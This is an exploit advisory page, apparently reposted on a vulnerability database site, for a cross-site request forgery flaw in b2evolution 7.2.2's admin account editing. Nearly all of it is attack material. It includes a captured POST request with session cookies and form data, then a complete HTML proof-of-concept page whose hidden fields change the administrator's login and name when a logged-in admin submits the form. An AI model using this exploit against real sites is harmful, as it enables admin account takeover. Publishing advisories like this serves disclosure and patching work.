Sunday, July 4, 2021

b2evolution 7.2.2 Cross Site Request Forgery

# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp

######## Description ########

Allows to attacker change admin account details.

######## Proof of Concept ########

===> REQUEST <====

POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

## < SNIPP >

edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1




#### Proof-Of-Concept ####

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_gender" value="M" />
<input type="hidden" name="edited_user_ctry_ID" value="233" />
<input type="hidden" name="edited_user_rgn_ID" value="" />
<input type="hidden" name="edited_user_subrg_ID" value="" />
<input type="hidden" name="edited_user_city_ID" value="" />
<input type="hidden" name="edited_user_age_min" value="" />
<input type="hidden" name="edited_user_age_max" value="" />
<input type="hidden" name="edited_user_birthday_month" value="" />
<input type="hidden" name="edited_user_birthday_day" value="" />
<input type="hidden" name="edited_user_birthday_year" value="" />
<input type="hidden" name="organizations[]" value="1" />
<input type="hidden" name="org_roles[]" value="King of Spades" />
<input type="hidden" name="org_priorities[]" value="" />
<input type="hidden" name="uf_1" value="I am the demo administrator of this site.
I love having so much power!" />
<input type="hidden" name="uf_new[2][]" value="" />
<input type="hidden" name="uf_new[3][]" value="" />
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
<input type="hidden" name="new_field_type" value="0" />
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
<input type="hidden" name="ctrl" value="user" />
<input type="hidden" name="user_tab" value="profile" />
<input type="hidden" name="identity_form" value="1" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="orig_user_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated